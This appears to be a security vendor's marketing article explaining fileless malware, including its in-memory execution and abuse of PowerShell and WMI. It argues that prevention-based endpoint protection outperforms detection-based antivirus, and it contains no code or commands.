Fileless malware is surging. Can your existing endpoint solutions handle their evasive nature?

One of the most dangerous of attack types today is that of fileless malware. Why, dangerous? Because, it’s ten times more successful than file-based attacks, according to Ponemon’s State of Endpoint Security Risk Report. This form of evasive threats differentiates itself from traditional malware by keeping malicious logic solely in memory of the infected system, avoiding leaving any clearly-malicious code on the file system. Such attacks also involve leveraging built-in Windows tools such as PowerShell and Windows Management Instrumentation (WMI) to bypass detection. In essence, a legitimate process is used to carry out commands both locally and on remote endpoints, download payloads, and even launch other executables.

Fileless attacks are considered evasive in nature because of a few characteristics:

  • They have no signature to detect: Since the processes being run are part of the OS, there is no unique malware executable to use to identify the malware. Detection-focused AV is usually ineffective when coming up against this attack technique.
  • They use reputable tools: PowerShell and WMI are used by IT to perform legitimate tasks, so using these tools makes it difficult for endpoint protection solutions monitoring processes to spot malicious use.
  • They keep malicious code primarily in memory: Because there are no clearly malicious artifacts on the file system, detection-based AV approaches become ineffective at determining whether the program is malicious in intent.

Add to this the sheer power and control available through the abused legitimate tools–once a set of elevated credentials is compromised, fileless malware can move laterally through a network, increasing the scope of infection and the attacker’s reach. Cybercriminals are increasingly turning to fileless malware as their “go-to” toolbox—with PowerShell attacks surging 432% in 2017, according to the March 2018 McAfee Labs Threats Report.

So, how do you stop fileless attacks?

Many commonly-used AV approaches are powerless to spot fileless attacks, making this one of the more challenging attack methods to stop. What’s needed is a means by which to prevent these attacks without relying on detection-based AV methods to stop them.

Fileless attacks are one of the Achilles Heels of detection-based solutions – mostly, because there are no tell-tale file artifacts to identify an attack. Detection of a fileless attack involves some very detailed monitoring and analysis of any use of PowerShell or other mechanisms abused as part of a fileless attack, looking for similarities to previously-seen malicious scripts, anomalous spawning of processes, connections to remote machines, etc. Many endpoint protection and so-called “next-gen” AV solutions offer this kind of monitoring. The challenge with this methodology is that it is only effective against a small subset of fileless attack patterns. Attackers are still free to abuse tools such as PowerShell (as long as the AV engine doesn’t consider the activity suspicious). Think about that–detection doesn’t mean fileless attacks are spotted the moment they occur; it means they are spotted once the behavior is deemed abnormal–which can be after malicious actions have been taken.

In contrast, a prevention approach that isn’t grounded in detection-based AV algorithms can account for the context within which the attacker is attempting to abuse a legitimate OS component. For instance, it can deceive the exploit into believing it cannot gain access to PowerShell or WMI, taking away its ability to infect. If the attackers code fails at locating or interacting with its dependencies, it will exit or crash, thus failing to infect the endpoint.

Protecting Against Fileless Malware

If you’re like most organizations, you’re still heavily relying on detection as your primary means of protecting endpoints. And, while it is possible for some fileless malware to be detected based on its behavior, you increase the risk of a successful attack by relying on detection alone. By adding a solution that focuses on prevention of fileless malware attacks without relying on detection–as well as that fights other evasive malware techniques–you reduce the chance of a successful attack to a minimum.